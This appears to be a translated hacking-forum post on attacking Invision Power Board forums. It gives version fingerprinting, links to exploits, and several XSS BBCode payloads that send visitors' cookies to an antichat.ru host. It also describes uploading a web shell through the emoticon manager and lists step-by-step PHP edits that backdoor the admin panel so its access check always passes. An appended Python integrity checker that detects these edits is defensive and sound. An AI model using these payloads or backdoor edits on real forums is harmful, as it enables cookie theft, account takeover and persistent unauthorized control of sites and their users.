How to determine the forum version

Version Invision Power Board 1.3
If there are such folders and files:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
Such files:
ssi.php
show.php
css.php
conf_mime_types.php

Version Invision Power Board 2.0.*
If there are such folders and files:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
Shows error 403 "access forbidden", for example for the folder /ips_kernel/, as:
403: Invision Power Board -> Forbidden

Version Invision Power Board 2.1.*
If there are such folders and files:
/ips_kernel/PEAR/
Such files:
info.php
Shows 403 "access forbidden", for example for the folder /ips_kernel/, as:
403: Invision Power Board -> Forbidden

Exploits
Version Invision Power Board 1.3.1
_http://milw0rm.com/id.php?id=1036
Version Invision Power Board 1.*, 2.* (<2.0.4)
_http://rst.void.ru/download/r57ipb2.txt
Version Invision Power Board 2.0.0 - 2.0.2
_http://milw0rm.com/id.php?id=648
Version Invision Power Board Army System Mod 2.1
_http://www.milw0rm.com/exploits/1492
Version Invision Power Board 2.1.4 (DoS)
_http://www.milw0rm.com/id.php?id=1489
Version Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html

XSS
Do not use these codes with the sign "*". It is used so that these codes won't work on this forum.
Code:
[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Code:
[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor][color=wh*ite]` style=`backg*round:url(javascript:docu*ment.images [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]

Code:
[EMA*IL][email protected][U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]

Code:
[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]

Code:
[em*ail][email protected][/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Code:
[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)

Code:
[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`

Load shell
Invision Power Board 1.3: Administration -> Manage Emoticons -> Upload an Emoticon to the emoticons directory.
Usually the shell is uploaded into one of these folders, depending on the version, if your access is sufficient:
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
where shell.php is the name of your uploaded shell.

Trojaning the forum
Invision Power Board 1.3
PHP:
if ($GROUP['g_access_cp'] != 1)
{
    do_login("You do not have access to the administrative CP");
}
else
{
    $session_validated = 1;
    $this_session = $row;
}
and change to:
PHP:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
    $session_validated = 1;
    $this_session = $row;
}
and search for the lines (by default line 442):
PHP:
if ($GROUP['g_access_cp'] != 1)
{
    do_login("You do not have access to the administrative CP");
}
else
{
    //----------------------------------
    // All is good, rejoice as we set a
    // session for this user
    //----------------------------------
    $sess_id = md5( uniqid( microtime() ) );
and change to:
PHP:
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)
{
    //----------------------------------
    // All is good, rejoice as we set a
    // session for this user
    //----------------------------------
    $sess_id = md5( uniqid( microtime() ) );
Then we edit the file /sources/Admin/ad_mysql.php and delete the lines:
PHP:
if ($MEMBER['mgroup'] != $INFO['admin_group'])
{
    $ADMIN->error("Sorry, these functions are for the root admin group only");
}

Invision Power Board 2.0.*
/sources/action_admin/login.php, by default line 147, delete the lines:
PHP:
if ($mem['g_access_cp'] != 1)
{
    $this->login_form("You do not have access to the administrative CP");
}
else
{
and on the line (by default 206) delete the character "}", naturally without quotation marks.
sql.php, by default line 46: we delete
PHP:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
    $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
Then we go here: /sources/lib/admin_functions.php (line 262) and change the line
PHP:
$this->ipsclass->admin_session['_session_validated'] = 0;
to
PHP:
$this->ipsclass->admin_session['_session_validated'] = 1;
Then we delete the lines in the file /sources/sql_mysql.php (by default line 76):
Code:
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
    $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}

Now we'll explain all this in detail. When you log in to admincp (without "trojaning"), the check
if ($GROUP['g_access_cp'] != 1)
verifies whether you have access to admincp
{
    do_login("you do not have access to the administrative CP");
}
To obtain access it is necessary to change this line from
if ($GROUP['g_access_cp'] != 1)
to
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 )
--------------------
Thanks [B]qBiN[/B]
Original version here: http://forum.antichat.ru/thread11615.html by [b]k1b0rg[/b]
[SIZE=1][edit: some mistakes were corrected (too tired to look more), real copyrights added] [/SIZE]
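A defender's counterpart to the source modifications described in the post above, added here as an example and not part of the original thread: an integrity check that flags the admin CP gate rewritten into an always-true condition, a gate whose refusal branch was deleted, the `_session_validated` flag forced to 1, and PHP files dropped into the emoticon upload directories. The sample file contents are constructed from the snippets quoted in the post; the directory names and the assumption that no `.php` file belongs under an emoticon directory are taken from it.

```python
import re

# Constructed samples modelled on the snippets quoted in the post (not real IPB files):
# the untouched 1.3 admin CP gate, the tampered 1.3 gate, and the forced 2.0 session flag.
ORIGINAL_GATE_13 = """if ($GROUP['g_access_cp'] != 1)
{
    do_login("You do not have access to the administrative CP");
}
else
{
    $session_validated = 1;
    $this_session = $row;
}
"""
TAMPERED_GATE_13 = """if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1)
{
    $session_validated = 1;
    $this_session = $row;
}
"""
FORCED_SESSION_20 = "$this->ipsclass->admin_session['_session_validated'] = 1;\n"

# Gate rewritten into an always-true condition (X != 1 || X == 1), as the post shows.
ALWAYS_TRUE_GATE = re.compile(
    r"g_access_cp'\]\s*!=\s*1\s*\|\|\s*\$\w+\['g_access_cp'\]\s*==?\s*1")
# admin_session['_session_validated'] hard-set to 1 instead of the original 0.
FORCED_VALIDATED = re.compile(r"_session_validated'\]\s*=\s*1\s*;")

def audit_source(php_text):
    """Return the names of tampering indicators found in one PHP source file."""
    findings = []
    if ALWAYS_TRUE_GATE.search(php_text):
        findings.append("admincp_gate_always_true")
    # A gate that still reads g_access_cp but no longer refuses anyone
    # (the do_login / login_form branch was deleted) is also suspicious.
    if "g_access_cp" in php_text and not re.search(r"do_login\(|login_form\(", php_text):
        findings.append("admincp_gate_missing")
    if FORCED_VALIDATED.search(php_text):
        findings.append("session_forced_validated")
    return findings

# Emoticon upload directories named in the post for 1.3 and 2.* respectively.
EMOTICON_DIRS = ("/html/emoticons/", "/style_emoticons/")

def suspicious_uploads(paths):
    """PHP files under an emoticon directory should never exist; list any found."""
    return [p for p in paths
            if p.lower().endswith(".php") and any(d in p for d in EMOTICON_DIRS)]
```

Run `audit_source` over each file under /sources/ and `suspicious_uploads` over a recursive listing of the forum root; a clean install returns empty lists for both.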
Did you use a translator? Plenty of mistakes... When I come back home, I'll correct your post. Check your translation next time please.